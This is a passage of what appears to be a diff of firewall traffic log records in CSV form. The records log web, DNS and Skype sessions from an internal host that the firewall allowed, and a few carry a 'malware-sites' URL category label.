09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26161,1,59206,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26000,1,59205,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,65184,1,56858,80,0,0,0x200000,tcp,allow,1910,1359,551,21,2012/04/10 04:29:54,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26522,1,59314,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26067,1,59313,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26573,1,52139,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26894,1,60592,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25258,1,57322,53,0,0,0x200000,udp,allow,164,66,98,2,2012/04/10 04:39:26,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25025,1,59204,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26138,1,59203,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,27175,1,59305,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26261,1,64005,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25022,1,58768,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,98.149.55.63,0.0.0.0,0.0.0.0,rule1,crusher,,skype,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24027,1,47752,13069,0,0,0x200000,udp,allow,1008,504,504,16,2012/04/10 04:37:50,125,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,8,8 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26360,1,59304,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26394,1,54533,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:55,192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24917,1,59201,80,0,0,0x200000,tcp,allow,9967,837,9130,20,2012/04/10 04:39:24,1,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,10,10 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,22860,1,59303,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,14146,1,50876,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25876,1,57657,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24910,1,59302,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26862,1,59301,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26222,1,64844,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26329,1,52257,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,8.8.8.8,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25142,1,38796,53,0,0,0x0,udp,allow,206,95,111,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25095,1,59200,80,0,0,0x200000,tcp,allow,1503,597,906,13,2012/04/10 04:39:23,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,50.19.102.116,0.0.0.0,0.0.0.0,rule1,,,paloalto-wildfire-cloud,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,24787,1,48412,443,0,0,0x0,tcp,allow,5817,804,5013,17,2012/04/10 04:39:24,0,computer-and-internet-security,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,10,7 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,65.55.223.19,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25948,1,47752,40026,0,0,0x200000,udp,allow,286,187,99,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,65.55.223.24,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25444,1,47752,40029,0,0,0x200000,udp,allow,978,76,902,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,8.8.8.8,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25349,1,52189,53,0,0,0x0,udp,allow,227,86,141,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25713,1,59300,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,26499,1,54414,53,0,0,0x200000,udp,allow,73,73,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25437,1,59299,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24848,1,60399,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24924,1,59626,53,0,0,0x200000,udp,allow,482,166,316,4,2012/04/10 04:39:22,1,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,2,2 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25899,1,51542,53,0,0,0x200000,udp,allow,196,75,121,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26066,1,54182,53,0,0,0x200000,udp,allow,244,75,169,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24908,1,59199,80,0,0,0x200000,tcp,allow,1548,594,954,13,2012/04/10 04:39:23,0,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25105,1,59198,80,0,0,0x200000,tcp,allow,10135,1005,9130,22,2012/04/10 04:39:21,2,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,11964,1,56856,80,0,0,0x200000,tcp,allow,1918,1363,555,21,2012/04/10 04:29:51,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26502,1,52489,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26338,1,59298,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24919,1,60185,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26731,1,51817,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,65.55.223.31,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26504,1,47752,40043,0,0,0x200000,udp,allow,186,186,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25543,1,59297,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,21948,1,52537,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,26279,1,53155,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:52,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24894,1,59197,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:21,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24985,1,56995,53,0,0,0x200000,udp,allow,251,88,163,2,2012/04/10 04:39:22,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25380,1,59069,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24994,1,55697,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25451,1,59295,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:51,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,24866,1,59196,80,0,0,0x200000,tcp,allow,1500,578,922,13,2012/04/10 04:39:20,1,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26414,1,59291,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26131,1,52858,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26555,1,61383,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,15099,1,59290,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,8.5.1.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24980,1,59195,80,0,0,0x200000,tcp,allow,28096,1310,26786,39,2012/04/10 04:39:20,0,not-resolved,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,17,22 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26215,1,49812,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25881,1,50185,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24955,1,59286,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 